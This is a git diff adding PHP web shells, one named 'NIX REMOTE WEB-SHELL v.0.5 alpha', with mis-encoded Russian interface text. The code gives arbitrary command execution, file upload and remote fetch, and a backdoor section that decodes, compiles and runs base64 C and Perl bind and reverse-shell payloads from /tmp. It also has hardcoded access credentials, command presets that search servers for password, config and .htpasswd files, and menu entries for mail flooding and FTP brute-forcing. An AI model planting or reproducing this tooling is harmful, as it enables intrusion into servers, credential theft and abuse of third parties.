+           (($perms & 0x0400) ? 'S' : '-'));
+$info .= (($perms & 0x0004) ? 'r' : '-');
+$info .= (($perms & 0x0002) ? 'w' : '-');
+$info .= (($perms & 0x0001) ?
+           (($perms & 0x0200) ? 't' : 'x' ) :
+           (($perms & 0x0200) ? 'T' : '-'));
+return $info;
+}
+for ($i=0;$i<sizeof($dirs);$i++) {
+   if ($dirs[$i] != "..") {
+
+
+if(is_writable($dirs[$i])){$info="<font color=green><li>&nbsp;W</font>";}
+else{$info="<font color=red><li>&nbsp;R</font>";}
+$perms = @fileperms($d."/".$dirs[$i]);
+$owner = @fileowner($d."/".$dirs[$i]);
+if($os=="unix"){
+$fileownera=posix_getpwuid($owner);
+$owner=$fileownera['name'];
+}
+$group = @filegroup($d."/".$dirs[$i]);
+if($os=="unix"){
+$groupinfo = posix_getgrgid($group);
+$group=$groupinfo['name'];
+}
+$info=perm($perms);
+if($i%2){$color="#aed7ff";}else{$color="#68adf2";}
+$linkd="<a href='$php_self?ac=navigation&d=$d/$dirs[$i]'>$dirs[$i]</a>";
+$linkd=str_replace("//","/",$linkd);
+echo "<tr><td bgcolor=$color><font face=wingdings size=2>0</font> $linkd</td><td bgcolor=$color>&nbsp;</td><td bgcolor=$color>$info</td></tr>";
+}
+}
+for ($i=0;$i<sizeof($files);$i++) {
+if(is_writable($files[$i])){$info="<font color=green><li>&nbsp;W</font>";}
+else{$info="<font color=red><li>&nbsp;R</font>";}
+$size=@filesize($d."/".$files[$i]);
+$perms = @fileperms($d."/".$files[$i]);
+$owner = @fileowner($d."/".$files[$i]);
+if($os=="unix"){
+$fileownera=posix_getpwuid($owner);
+$owner=$fileownera['name'];
+}
+$group = @filegroup($d."/".$files[$i]);
+if($os=="unix"){
+$groupinfo = posix_getgrgid($group);
+$group=$groupinfo['name'];
+}
+$prava=perm($perms);
+if($i%2){$color="#ccccff";}else{$color="#b0b0ff";}
+
+if ($size < 1024){$siz=$size.' b';
+}else{
+if ($size < 1024*1024){$siz=number_format(($size/1024), 2, '.', '').' kb';}else{
+if ($size < 1000000000){$siz=number_format($size/(1024*1024), 2, '.', '').' mb';}else{
+if ($size < 1000000000000){$siz=number_format($size/(1024*1024*1024), 2, '.', '').' gb';}
+}}}
+echo "<tr><td bgcolor=$color><font face=wingdings size=3>2</font> <a href='$php_self?ac=navigation&d=$d&e=$files[$i]'title='Äîñòóï $prava. Âëàäåëåö $owner/$group'>$files[$i]</a></td><td bgcolor=$color>$siz</td><td bgcolor=$color>$prava</td></tr>";
+}
+
+echo "</table></td></tr></table>";
+break;
+// Óñòàíîâêà áåêäîğà
+case "backconnect":
+echo "<b>Óñòàíîâêà áåêäîğà / îòêğûòèå ïîğòà</b>";
+echo "<form name=bind method=POST>";
+echo "<font face=Verdana size=-2>";
+echo "<b>Îòêğûòü ïîğò </b>";
+echo "<input type=text name=port size=15 value=11457>&nbsp;";
+echo "<b>Ïàğîëü äëÿ äîñòóïà </b>";
+echo "<input type=text name=bind_pass size=15 value=nrws>&nbsp;";
+echo "<b>Èñïîëüçîâàòü </b>";
+echo "<select size=\"1\" name=\"use\">";
+echo "<option value=\"Perl\">Perl</option>";
+echo "<option value=\"C\">C</option>";
+echo "</select>&nbsp;";
+echo "<input type=hidden name=dir value=".$dir.">";
+echo "<input type=submit name=submit value=Îòêğûòü>";
+echo "</font>";
+echo "</form>";
+
+echo "<b>Óñòàíîâêà áåêäîğà / áåêêîííåêò</b>";
+echo "<form name=back method=POST>";
+echo "<font face=Verdana size=-2>";
+echo "<b>IP-àäğåñ </b>";
+echo "<input type=text name=ip size=15 value=127.0.0.1>&nbsp;";
+echo "<b>Ïîğò </b>";
+echo "<input type=text name=port size=15 value=31337>&nbsp;";
+echo "<b>Èñïîëüçîâàòü </b>";
+echo "<select size=\"1\" name=\"use\">";
+echo "<option value=\"Perl\">Perl</option>";
+echo "<option value=\"C\">C</option>";
+echo "</select>&nbsp;";
+echo "<input type=hidden name=dir value=".$dir.">";
+echo "<input type=submit name=submit value=Âûïîëíèòü>";
+echo "</font>";
+echo "</form>";
+
+
+/* port bind C */
+if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="C"))
+{
+ $w_file=fopen("/tmp/bd.c","ab+") or $err=1;
+ if($err==1)
+ {
+ echo "<font color=red face=Fixedsys><div align=center>Error! Can't write in /tmp/bd.c</div></font>";
+ $err=0;
+ }
+ else
+ {
+ fputs($w_file,base64_decode($port_bind_bd_c));
+ fclose($w_file);
+ $blah=exec("gcc -o /tmp/bd /tmp/bd.c");
+ unlink("/tmp/bd.c");
+ $bind_string="/tmp/bd ".$_POST['port']." ".$_POST['bind_pass']." &";
+ $blah=exec($bind_string);
+ $_POST['cmd']="ps -aux | grep bd";
+ $err=0;
+ }
+}
+
+/* port bind Perl */
+if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="Perl"))
+{
+ $w_file=fopen("/tmp/bdpl","ab+") or $err=1;
+ if($err==1)
+ {
+ echo "<font color=red face=Fixedsys><div align=center>Îøèáêà! Íå ìîãó çàïèñàòü â /tmp/</div></font>";
+ $err=0;
+ }
+ else
+ {
+ fputs($w_file,base64_decode($port_bind_bd_pl));
+ fclose($w_file);
+ $bind_string="perl /tmp/bdpl ".$_POST['port']." &";
+ $blah=exec($bind_string);
+ $_POST['cmd']="ps -aux | grep bdpl";
+ $err=0;
+ }
+}
+
+/* back connect Perl */
+if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="Perl"))
+{
+ $w_file=fopen("/tmp/back","ab+") or $err=1;
+ if($err==1)
+ {
+ echo "<font color=red face=Fixedsys><div align=center>Îøèáêà! Íå ìîãó çàïèñàòü â /tmp/</div></font>";
+ $err=0;
+ }
+ else
+ {
+ fputs($w_file,base64_decode($back_connect));
+ fclose($w_file);
+ $bc_string="perl /tmp/back ".$_POST['ip']." ".$_POST['port']." &";
+ $blah=exec($bc_string);
+ $_POST['cmd']="echo \"Ñåé÷àñ ñêğèïò êîííåêòèòñÿ ê ".$_POST['ip']." port ".$_POST['port']." ...\"";
+ $err=0;
+ }
+}
+
+/* back connect C */
+if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="C"))
+{
+ $w_file=fopen("/tmp/back.c","ab+") or $err=1;
+ if($err==1)
+ {
+ echo "<font color=red face=Fixedsys><div align=center>Error! Can't write in /tmp/back.c</div></font>";
+ $err=0;
+ }
+ else
+ {
+ fputs($w_file,base64_decode($back_connect_c));
+ fclose($w_file);
+ $blah=exec("gcc -o /tmp/backc /tmp/back.c");
+ unlink("/tmp/back.c");
+ $bc_string="/tmp/backc ".$_POST['ip']." ".$_POST['port']." &";
+ $blah=exec($bc_string);
+ $_POST['cmd']="echo \"Ñåé÷àñ ñêğèïò êîííåêòèòñÿ ê ".$_POST['ip']." port ".$_POST['port']." ...\"";
+ $err=0;
+ }
+}
+echo "<font face=Verdana size=-2>Âûïîëíåííàÿ êîìàíäà: <b>".$_POST['cmd']."</b></font></td></tr><tr><td>";
+echo "<b>";
+echo "<br>Ğåçóëüòàò: ";
+echo "<font color=red size=2";
+print "".passthru($_POST['cmd'])."";
+echo "</font></b>";
+break;
+
+// Uploading
+case "upload":
+
+echo <<<HTML
+<b>Çàãğóçêà ôàéëîâ</b>
+<a href='$php_self?ac=massupload&d=$d&t=massupload'>* Çàãğóçèòü áîëüøîå êîëè÷åñòâî ôàéëîâ *</a><br><br>
+<table>
+<form enctype="multipart/form-data" action="$self" method="POST">
+<input type="hidden" name="ac" value="upload">
+<tr>
+<td>Ôàéë:</td>
+<td><input size="48" name="file" type="file"></td>
+</tr>
+<tr>
+<td>Ïàïêà:</td>
+<td><input size="48" value="$docr/" name="path" type="text"><input type="submit" value="Ïîñëàòü"></td><br>
+$tend
+HTML;
+
+if (isset($_POST['path'])){
+
+$uploadfile = $_POST['path'].$_FILES['file']['name'];
+if ($_POST['path']==""){$uploadfile = $_FILES['file']['name'];}
+
+if (copy($_FILES['file']['tmp_name'], $uploadfile)) {
+    echo "Ôàéë óñïåøíî çàãğóæåí â ïàïêó $uploadfile\n";
+    echo "Èìÿ:" .$_FILES['file']['name']. "\n";
+    echo "Ğàçìåğ:" .$_FILES['file']['size']. "\n";
+
+} else {
+    print "Íå óäà¸òñÿ çàãğóçèòü ôàéë. Èíôà:\n";
+    print_r($_FILES);
+}
+}
+
+
+echo "<form enctype='multipart/form-data' action='?ac=upload&status=ok' method=post>
+<b>Çàãğóçêà ôàéëîâ ñ óäàëåííîãî êîìïüşòåğà:</b><br>
+ HTTP ïóòü ê ôàéëó: <br>
+<input type='text' name='file3' value='http://' size=40><br>
+Íàçâàíèå ôàéëà èëè ïóòü ñ íàçâàíèåì ôàéëà: <br>
+<input type='text' name='file2' value='$docr/' size=40><br>
+<input type='submit' value='Çàãğóçèòü ôàéë'></form>";
+
+
+if (!isset($status)) downfiles();
+
+else
+{
+
+$data = @implode("", file($file3));
+$fp = @fopen($file2, "wb");
+@fputs($fp, $data);
+$ok = @fclose($fp);
+if($ok)
+{
+$size = filesize($file2)/1024;
+$sizef = sprintf("%.2f", $size);
+
+print "<br><center>Âû çàãğóçèëè: <b>ôàéë <u>$file2</u> ğàçìåğîì</b> (".$sizef."êÁ) </center>";
+}
+else
+{
+print "<br><center><font color=red  size = 2><b>Îøèáêà çàãğóçêè ôàéëà</b></font></center>";
+}
+}
+
+
+
+break;
+// Tools
+case "tools":
+echo "<form method=post>Ãåíåğàöèÿ md5 øèôğà<br><input name=md5 size=30></form><br>";
+@$md5=@$_POST['md5'];
+if(@$_POST['md5']){ echo "md5 ñãåíåğèğîâàí:<br> ".md5($md5)."";}
+echo "<br>
+<form method=post>Êîäèğîâàíèå/äåêîäèğîâàíèå base64<br><input name=base64 size=30></form><br>";
+if(@$_POST['base64']){
+@$base64=$_POST['base64'];
+echo "
+Êîäèğîâàíî:<br><textarea rows=8 cols=80>".base64_encode($base64)."</textarea><br>
+Äåêîäèğîâàíî: <br><textarea rows=8 cols=80>".base64_decode($base64)."</textarea><br>";}
+echo "<br>
+<form method=post>DES êîäèğîâàíèå:<br><input name=des size=30></form><br>";
+if(@$_POST['des']){
+@$des=@$_POST['des'];
+echo "Des ñãåíåğèğîâàí: <br>".crypt($des)."";}
+echo "<br>
+<form method=post>SHA1 êîäèğîâàíèå:<br><input name=sha1 size=30></form><br>";
+if(@$_POST['sha1']){
+@$des=@$_POST['sha1'];
+echo "SHA1 ñãåíåğèğîâàí: <br>".sha1($sha1a)."";}
+
+echo "<form method=POST>";
+echo "html-êîä -> øåñòíàäöàòèğè÷íûå çíà÷åíèÿ<br><input type=text name=data size=30>";
+
+
+if (isset($_POST['data']))
+{
+echo "<br><br><b>Ğåçóëüòàò:<br></b>";
+$str=str_replace("%20","",$_POST['data']);
+for($i=0;$i<strlen($str);$i++)
+{
+$hex=dechex(ord($str[$i]));
+if ($str[$i]=='&') echo "$str[$i]";
+else if ($str[$i]!='\\') echo "%$hex";
+}
+}
+exit;
+break;
+// Mass Uploading
+case "massupload":
+
+
+echo "
+Ìàñîâàÿ çàãğóçêà ôàéëîâ:<br>
+<form enctype=\"multipart/form-data\" method=post>
+<input type=file name=text1 size=43> <input type=file name=text11 size=43><br>
+<input type=file name=text2 size=43> <input type=file name=text12 size=43><br>
+<input type=file name=text3 size=43> <input type=file name=text13 size=43><br>
+<input type=file name=text4 size=43> <input type=file name=text14 size=43><br>
+<input type=file name=text5 size=43> <input type=file name=text15 size=43><br>
+<input type=file name=text6 size=43> <input type=file name=text16 size=43><br>
+<input type=file name=text7 size=43> <input type=file name=text17 size=43><br>
+<input type=file name=text8 size=43> <input type=file name=text18 size=43><br>
+<input type=file name=text9 size=43> <input type=file name=text19 size=43><br>
+<input type=file name=text10 size=43> <input type=file name=text20 size=43><br>
+<input name=where size=43 value='$docr'><br>
+<input type=submit value=Çàãğóçèòü name=massupload>
+</form><br>";
+
+if(@$_POST['massupload']){
+$where=@$_POST['where'];
+$uploadfile1 = "$where/".@$_FILES['text1']['name'];
+$uploadfile2 = "$where/".@$_FILES['text2']['name'];
+$uploadfile3 = "$where/".@$_FILES['text3']['name'];
+$uploadfile4 = "$where/".@$_FILES['text4']['name'];
+$uploadfile5 = "$where/".@$_FILES['text5']['name'];
+$uploadfile6 = "$where/".@$_FILES['text6']['name'];
+$uploadfile7 = "$where/".@$_FILES['text7']['name'];
+$uploadfile8 = "$where/".@$_FILES['text8']['name'];
+$uploadfile9 = "$where/".@$_FILES['text9']['name'];
+$uploadfile10 = "$where/".@$_FILES['text10']['name'];
+$uploadfile11 = "$where/".@$_FILES['text11']['name'];
+$uploadfile12 = "$where/".@$_FILES['text12']['name'];
+$uploadfile13 = "$where/".@$_FILES['text13']['name'];
+$uploadfile14 = "$where/".@$_FILES['text14']['name'];
+$uploadfile15 = "$where/".@$_FILES['text15']['name'];
+$uploadfile16 = "$where/".@$_FILES['text16']['name'];
+$uploadfile17 = "$where/".@$_FILES['text17']['name'];
+$uploadfile18 = "$where/".@$_FILES['text18']['name'];
+$uploadfile19 = "$where/".@$_FILES['text19']['name'];
+$uploadfile20 = "$where/".@$_FILES['text20']['name'];
+if (@move_uploaded_file(@$_FILES['text1']['tmp_name'], $uploadfile1)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Çàãğóæåíî: $uploadfile1</i><br>";}
+if (@move_uploaded_file(@$_FILES['text2']['tmp_name'], $uploadfile2)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Çàãğóæåíî: $uploadfile2</i><br>";}
+if (@move_uploaded_file(@$_FILES['text3']['tmp_name'], $uploadfile3)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Çàãğóæåíî: $uploadfile3</i><br>";}
+if (@move_uploaded_file(@$_FILES['text4']['tmp_name'], $uploadfile4)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Çàãğóæåíî: $uploadfile4</i><br>";}
+if (@move_uploaded_file(@$_FILES['text5']['tmp_name'], $uploadfile5)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Çàãğóæåíî: $uploadfile5</i><br>";}
+if (@move_uploaded_file(@$_FILES['text6']['tmp_name'], $uploadfile6)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Çàãğóæåíî: $uploadfile6</i><br>";}
+if (@move_uploaded_file(@$_FILES['text7']['tmp_name'], $uploadfile7)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Çàãğóæåíî: $uploadfile7</i><br>";}
+if (@move_uploaded_file(@$_FILES['text8']['tmp_name'], $uploadfile8)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Çàãğóæåíî: $uploadfile8</i><br>";}
+if (@move_uploaded_file(@$_FILES['text9']['tmp_name'], $uploadfile9)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Çàãğóæåíî: $uploadfile9</i><br>";}
+if (@move_uploaded_file(@$_FILES['text10']['tmp_name'], $uploadfile10)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Çàãğóæåíî: $uploadfile10</i><br>";}
+if (@move_uploaded_file(@$_FILES['text11']['tmp_name'], $uploadfile11)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Çàãğóæåíî: $uploadfile11</i><br>";}
+if (@move_uploaded_file(@$_FILES['text12']['tmp_name'], $uploadfile12)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Çàãğóæåíî: $uploadfile12</i><br>";}
+if (@move_uploaded_file(@$_FILES['text13']['tmp_name'], $uploadfile13)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Çàãğóæåíî: $uploadfile13</i><br>";}
+if (@move_uploaded_file(@$_FILES['text14']['tmp_name'], $uploadfile14)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Çàãğóæåíî: $uploadfile14</i><br>";}
+if (@move_uploaded_file(@$_FILES['text15']['tmp_name'], $uploadfile15)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Çàãğóæåíî: $uploadfile15</i><br>";}
+if (@move_uploaded_file(@$_FILES['text16']['tmp_name'], $uploadfile16)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Çàãğóæåíî: $uploadfile16</i><br>";}
+if (@move_uploaded_file(@$_FILES['text17']['tmp_name'], $uploadfile17)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Çàãğóæåíî: $uploadfile17</i><br>";}
+if (@move_uploaded_file(@$_FILES['text18']['tmp_name'], $uploadfile18)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Çàãğóæåíî: $uploadfile18</i><br>";}
+if (@move_uploaded_file(@$_FILES['text19']['tmp_name'], $uploadfile19)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Çàãğóæåíî: $uploadfile19</i><br>";}
+if (@move_uploaded_file(@$_FILES['text20']['tmp_name'], $uploadfile20)) {
+$where=str_replace("\\\\","\\",$where);
+echo "<i>Çàãğóæåíî: $uploadfile20</i><br>";}
+}
+
+exit;
+break;
+case "selfremover":
+ print "<tr><td>";
+print "<font color=red face=verdana size=1>Òû óâåğåí, ÷òî õî÷åø óäàëèòü ıòîò øåëë ñ ñåğâåğà ?<br>
+<a href='$php_self?p=yes'>Äà, õî÷ó</a> | <a href='$php_self?'>Íåò, ïóñòü åùå ïîáóäåò</a><br>
+Áóäåì óäàëÿòü: <u>";
+$path=__FILE__;
+print $path;
+print " </u>?</td></tr></table>";
+die;
+}
+
+if($p=="yes"){
+$path=__FILE__;
+@unlink($path);
+$path=str_replace("\\","/",$path);
+if(file_exists($path)){$hmm="Ôàéë íåâîçìîæíî óäàëèòü!!!";
+print "<tr><td><font color=red>Ôàéë $path íå óäàëåí !</td></tr>";
+}else{$hmm="Óäàëåí";}
+print "<script>alert('$path $hmm');</script>";
+
+}
+break;
+
+
+?>
+
+
+
diff --git a/php/NIX_REMOTE_WEB-SHELL_v.0.5_alpha_Lite_Public_Version.php b/php/NIX_REMOTE_WEB-SHELL_v.0.5_alpha_Lite_Public_Version.php
new file mode 100644
index 0000000..ec24917
--- /dev/null
+++ b/php/NIX_REMOTE_WEB-SHELL_v.0.5_alpha_Lite_Public_Version.php
@@ -0,0 +1,1480 @@
+<?php
+$name="GaMMa";
+$pass="Hack";
+$demail ="xakep@xaep.ru";
+if (!isset($HTTP_SERVER_VARS['PHP_AUTH_USER']) || $HTTP_SERVER_VARS['PHP_AUTH_USER']!=$name || $HTTP_SERVER_VARS['PHP_AUTH_PW']!=$pass)
+   {
+   header("WWW-Authenticate: Basic realm=\"AdminAccess\"");
+   header("HTTP/1.0 401 Unauthorized");
+   exit("Access Denied");
+   }
+
+$title="NIX REMOTE WEB-SHELL";
+$ver=" v.0.5a Lite";
+
+?>
+<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
+<html>
+<head>
+<title>NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version </title>
+<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
+<meta http-equiv="pragma" content="no-cache">
+<meta http-equiv="Content-Language" content="en,ru"> 
+<META name="autor" content="DreAmeRz (www.dreamerz.cc)">
+<style type="text/css">
+BODY, TD, TR {
+text-decoration: none;
+font-family: Verdana;
+font-size: 8pt;
+scrollbar-face-color: #FFFFFF;
+scrollbar-shadow-color:#000000 ;
+scrollbar-highlight-color:#FFFFFF;
+scrollbar-3dlight-color: #000000;
+scrollbar-darkshadow-color:#FFFFFF ;
+scrollbar-track-color: #FFFFFF;
+scrollbar-arrow-color: #000000;
+}
+input, textarea, select {
+font-family: Verdana;
+font-size: 10px;
+color: black;
+background-color: white;
+border: solid 1px;
+border-color: black
+}
+UNKNOWN {
+COLOR: black;
+TEXT-DECORATION: none
+}
+A:link {COLOR:black; TEXT-DECORATION: none}
+A:visited { COLOR:black; TEXT-DECORATION: none}
+A:active {COLOR:black; TEXT-DECORATION: none}
+A:hover {color:blue;TEXT-DECORATION: none}
+</STYLE>
+</HEAD>
+
+
+<BODY bgcolor="#fffcf9" text="#000000">
+<P align=center>[ <A href="javascript:history.next(+1)">Âïåğåä ] </A><B><FONT color=#cccccc size=4>*.NIX REMOTE WEB-SHELL</FONT></B>
+v.0.5a<FONT color=#linux size=1> Lite </FONT> [ <A href="javascript:history.back(-1)">Íàçàä ]</A>[ <A href="?ac=about" title='×òî óìååò ñêğèïò ...'>Î ñêğèïòå ]</a><BR>
+<A href="?ac=info" title='Óçíàé âñå îá ıòîé ñèñòåìå !'>[ Èíôîğìàöèÿ î ñèñòåìå</A> ][ <A href="?ac=navigation" title='Óäîáíàÿ ãğàôè÷åñêàÿ íàâèãàöèÿ. Ïğîñìîòğ, ğåäàêòèğîâàíèå ...'>Íàâèãàöèÿ</A> ][ <A href="?ac=backconnect" title='Óñòàíîâêà backconnect è îáû÷íîãî áåêäîğà '>Óñòàíîâêà
+áåêäîğà</A> ][ <A href="?ac=eval" title='Ñîçäàé ñâîé ñêğèïò íà ïõï ïğÿìî çäåñü :)'>ÏÕÏ êîä</A> ][ <A href="?ac=upload" title='Çàãğóçêà îäíîãî ôàéëà, ìàñîâàÿ çàãğóçêà, çàãğóçêà ôàéëîâ ñ óäàëåííîãî êîìïüşòåğà !'>Çàãğóçêà ôàéëîâ</A> ][ <A href="?ac=shell" title='bash shell,àëüÿñû ...'>Èñïîëíåíèå
+êîììàíä ]</A> <br><A href="?ac=sendmail" title='Îòïğàâ å-mail ïğÿìî îò ñşäà'> [ Îòïğàâêà ïèñüìà</A> ][ <A href="?ac=mailfluder" title='Òåáÿ êòî-òî äîñòàë ? Òîãäà òåáå ñşäà ...'>Ìàèëôëóäåğ</A>
+ ][ <A href="?ac=ftp" title='Áûñòğûé áğóòôîğñ ftp ñîåäèíåíèÿ'>Ôòï Brut</A> ][ <A href="?ac=tools" title='Êîäèğîâùèêè/äåêîäèğîâùèêè md5,des,sha1,base64 ... '>Èíñòğóìåíòû ]</A>[ <A href="?ac=ps" title='Îòîáğàæàåò ñïèñîê ïğîöåñîâ íà ñåğâåğå è ïîçâîëÿåò èõ óáèâàòü! '>Äåìîíû</A> ][ <A href="?ac=selfremover" title='Íàäîåë ıòîò ñåğâåğ ? Òîãäà ìîæíî óäàëèòü è øåëë ...'>Óäàëèòü øåëë</A> ]</P>
+<?php
+if (ini_get('register_globals') != '1') {
+
+  if (!empty($HTTP_POST_VARS))
+    extract($HTTP_POST_VARS);
+
+  if (!empty($HTTP_GET_VARS))
+    extract($HTTP_GET_VARS);
+  if (!empty($HTTP_SERVER_VARS))
+    extract($HTTP_SERVER_VARS);
+}
+Error_Reporting(E_COMPILE_ERROR|E_ERROR|E_CORE_ERROR);
+set_magic_quotes_runtime(0);
+set_time_limit(0); // óáğàòü îãğàíè÷åíèå ïî âğåìåíè
+ignore_user_abort(1); // Èãíîğèğîâàòü ğàçğûâ ñâÿçè ñ áğàóçåğîì
+error_reporting(0);
+$self = $_SERVER['PHP_SELF'];
+$docr = $_SERVER['DOCUMENT_ROOT'];
+$sern = $_SERVER['SERVER_NAME'];
+if (($_POST['dir']!=="") AND ($_POST['dir'])) { chdir($_POST['dir']); }
+$aliases=array(
+'------------------------------------------------------------------------------------' => 'ls -la;pwd;uname -a',
+'ïîèñê íà ñåğâåğå âñåõ ôàéëîâ ñ suid áèòîì' => 'find / -type f -perm -04000 -ls',
+'ïîèñê íà ñåğâåğå âñåõ ôàéëîâ ñ sgid áèòîì' => 'find / -type f -perm -02000 -ls',
+'ïîèñê â òåêóùåé äèğåêòîğèè âñåõ ôàéëîâ ñ sgid áèòîì' => 'find . -type f -perm -02000 -ls',
+'ïîèñê íà ñåğâåğå ôàéëîâ config' => 'find / -type f -name "config*"',
+'ïîèñê íà ñåğâåğå ôàéëîâ admin' => 'find / -type f -name "admin*"',
+'ïîèñê â òåêóùåé äèğåêòîğèè ôàéëîâ config' => 'find . -type f -name "config*"',
+'ïîèñê â òåêóùåé äèğåêòîğèè ôàéëîâ pass' => 'find . -type f -name "pass*"',
+'ïîèñê íà ñåğâåğå âñåõ äèğåêòîğèé è ôàéëîâ äîñòóïíûõ íà çàïèñü äëÿ âñåõ' => 'find / -perm -2 -ls',
+'ïîèñê â òåêóùåé äèğåêòîğèè âñåõ äèğåêòîğèé è ôàéëîâ äîñòóïíûõ íà çàïèñü äëÿ âñåõ' => 'find . -perm -2 -ls',
+'ïîèñê â òåêóùåé äèğåêòîğèè ôàéëîâ service.pwd' => 'find . -type f -name service.pwd',
+'ïîèñê íà ñåğâåğå ôàéëîâ service.pwd' => 'find / -type f -name service.pwd',
+'ïîèñê íà ñåğâåğå ôàéëîâ .htpasswd' => 'find / -type f -name .htpasswd',
+'ïîèñê â òåêóùåé äèğåêòîğèè ôàéëîâ .htpasswd' => 'find . -type f -name .htpasswd',
+'ïîèñê âñåõ ôàéëîâ .bash_history' => 'find / -type f -name .bash_history',
+'ïîèñê â òåêóùåé äèğåêòîğèè ôàéëîâ .bash_history' => 'find . -type f -name .bash_history',
+'ïîèñê âñåõ ôàéëîâ .fetchmailrc' => 'find / -type f -name .fetchmailrc',
+'ïîèñê â òåêóùåé äèğåêòîğèè ôàéëîâ .fetchmailrc' => 'find . -type f -name .fetchmailrc',
+'âûâîä ñïèñêà àòğèáóòîâ ôàéëîâ íà ôàéëîâîé ñèñòåìå ext2fs' => 'lsattr -va',
+'ïğîñìîòğ îòêğûòûõ ïîğòîâ' => 'netstat -an | grep -i listen',
+'ïîèñê âñåõ ïõï ôàéëîâ ñî ñëîâîì password' =>'find / -name *.php | xargs grep -li password',
+'ïîèñê ïàïîê ñ ìîäîì 777' =>'find / -type d -perm 0777',
+'Îïğåäèëåíèå âåğñèè ÎÑ' =>'sysctl -a | grep version',
+'Îïğåäèëåíèå âåğñèè ÿäğà' =>'cat /proc/version',
+'Ïğîñìîòğ syslog.conf' =>'cat /etc/syslog.conf',
+'Ïğîñìîòğ - Message of the day' =>'cat /etc/motd',
+'Ïğîñìîòğ hosts' =>'cat /etc/hosts',
+'Âåğñèÿ äèñòğèáóòèâà 1' =>'cat /etc/issue.net',
+'Âåğñèÿ äèñòğèáóòèâà 2' =>'cat /etc/*-realise',
+'Êîêàçàòü âñå ïğîöåñû' =>'ps auxw',
+'Ïğîöåññû òåêóùåãî ïîëüçîâàòåëÿ' =>'ps ux',
+'Ïîèñê httpd.conf' =>'locate httpd.conf');
+
+
+
+/* Port bind source */
+$port_bind_bd_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5
+jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5
+ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW5
+0IGFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnV
+mWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVtb3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0
+KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyh
+hdG9pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0F
+OWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULFNPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2N
+rZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2F
+kZHIgKikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB
+7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQogICBkdXAyKG5ld2ZkLDApOw0KICAgZHV
+wMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ
+6IiwxMCk7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyh
+hcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY29tZSB0byByNTcgc2hlbGwgJiYgL2J
+pbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGN
+sb3NlKG5ld2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW5
+0ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVudGVyZWQpO2krKykgDQp7DQppZih
+lbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID0
+9ICdccicpDQplbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCk
+pDQpyZXR1cm4gMDsNCn0=";
+
+$port_bind_bd_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZi
+AoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMSVNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2
+NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORV
